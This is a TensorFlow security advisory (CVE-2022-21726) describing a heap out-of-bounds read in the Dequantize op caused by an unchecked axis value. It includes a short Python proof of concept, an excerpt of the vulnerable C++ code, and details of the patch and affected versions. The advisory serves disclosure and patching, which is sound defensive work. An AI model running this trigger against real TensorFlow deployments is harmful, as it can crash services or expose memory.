## TFSA-2022-003: Heap OOB access in `Dequantize`

### CVE Number
CVE-2022-21726

### Impact
The [implementation of `Dequantize`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/dequantize_op.cc#L92-L153) does not fully validate the value of `axis` and can result in heap OOB accesses:

```python
import tensorflow as tf

@tf.function
def test():
  y = tf.raw_ops.Dequantize(
    input=tf.constant([1,1],dtype=tf.qint32),
    min_range=[1.0],
    max_range=[10.0],
    mode='MIN_COMBINED',
    narrow_range=False,
    axis=2**31-1,
    dtype=tf.bfloat16)
  return y

test()
```

The `axis` argument can be `-1` (the default value for the optional argument) or any other positive value at most the number of dimensions of the input. Unfortunately, the upper bound is not checked and this results in reading past the end of the array containing the dimensions of the input tensor:

```cc
  if (axis_ > -1) {
    num_slices = input.dim_size(axis_);
  }
  // ...
  int64_t pre_dim = 1, post_dim = 1;
  for (int i = 0; i < axis_; ++i) {
    pre_dim *= float_output.dim_size(i);
  }
  for (int i = axis_ + 1; i < float_output.dims(); ++i) {
    post_dim *= float_output.dim_size(i);
  }
```

### Patches
We have patched the issue in GitHub commit [23968a8bf65b009120c43b5ebcceaf52dbc9e943](https://github.com/tensorflow/tensorflow/commit/23968a8bf65b009120c43b5ebcceaf52dbc9e943).

The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team.
